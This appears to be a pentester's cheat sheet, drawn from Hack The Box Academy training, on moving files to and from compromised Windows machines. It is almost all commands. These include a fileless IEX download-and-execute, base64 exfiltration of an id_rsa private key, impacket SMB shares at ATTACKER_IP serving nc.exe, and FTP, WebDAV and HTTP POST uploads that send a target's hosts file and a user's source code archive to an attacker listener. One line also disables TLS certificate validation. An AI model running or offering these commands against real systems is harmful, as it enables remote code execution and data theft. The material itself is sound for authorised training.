CtrlK

Pentest Notes / File Transfers

Windows File Transfer

Download

Base64 Download

Get the md5 hash - for verification

md5sum id_rsa
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

Encode to base64 - attacker

cat id_rsa |base64 -w 0
-w 0 disables line wrapping

Decode from base64 - target

[IO.File]::WriteAllBytes("C:\Users\Public\decode_file", [Convert]::FromBase64String("base64_text"))

Powershell Download

Download file

(New-Object Net.WebClient).DownloadFile('[Target File URL]','[Output File Name]')

Download string - fileless method

Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression or IEX alias
IEX (New-Object Net.WebClient).DownloadString('[Output File Name]')

iwr, curl, wget or:

Invoke-WebRequest [Target File URL] -OutFile [Output File Name]

Common errors

• Incomplete internet explorer launch config
Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | IEX
• SSL/TLS secure channel certificate is not trusted
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Download

Create SMB server - attacker

sudo impacket-smbserver share -smb2support /tmp/smbshare
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Mount the SMB server with username and passwd - target

net use n: \[ATTACKER_IP]\share /user:test test
Copy file from SMB server - target
copy \[ATTACKER_IP]\share\nc.exe

FTP Download

Set up FTP server

sudo pip3 install pyftpdlib --break-system-packages
sudo python3 -m pyftpdlib --port 21
Create a Command File for the FTP Client and Download the Target File : https://academy.hackthebox.com/app/module/24/section/160
If the shell we get is not interactive as we might have to log in

Transfer files from FTP Server

(New-Object Net.WebClient).DownloadFile('ftp://[MACHINE_IP]/[file.txt]', 'C:\Users\Public\ftp-file.txt')

Upload

Base64 Upload

Get the md5 hash - for verification

md5sum id_rsa
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

Encode to base64 - target

[Convert]::ToBase64String((Get-Content -path "[full_path_of_file]" -Encoding byte))

Decode from base64 - attacker

echo "base64_text" | base64 -d

Powershell Upload

Powershell does not have built-in upload function

In target:

pip3 install uploadserver
python3 -m uploadserver
Script to upload a file to python upload server:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://[MACHINE_IP]:8000/upload -File [file_to_be_uploaded]

Powershell and Base64 Web - target

$b64 = [System.convert]::ToBase64String((Get-Content -Path '[full_path_of_file]' -Encoding Byte))
Invoke-WebRequest -Uri http://[MACHINE_IP]:8000/ -Method POST -Body $b64
Use nc to catch the base64 data - attacker
nc -lvnp 8000

SMB Upload

Moslty SMB, port 445 will be disabled, therefore, we use the python module WebDAV
If no restrictions: Use impacket-smbserver : in download

Install, run in target directory - target

sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Connect to WebDAV share - attacker

dir \192.168.49.128\DavWWWRoot
DavWWWRoot : Special keyword recognised by windows shell, it doesn't exit. Replace it with the folder name shown when above command is run

Upload files using SMB

copy C:\Users\john\Desktop\SourceCode.zip \[MACHINE_IP]\DavWWWRoot</span>
copy C:\Users\john\Desktop\SourceCode.zip \[MACHINE_IP]\sharefolder</span>

FTP Upload

Start Python FTP Server

sudo python3 -m pyftpdlib --port 21 --write

PowerShell Upload File

(New-Object Net.WebClient).UploadFile('ftp://[MACHINE_IP]/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

Living Off the land

https://academy.hackthebox.com/app/module/24/section/1575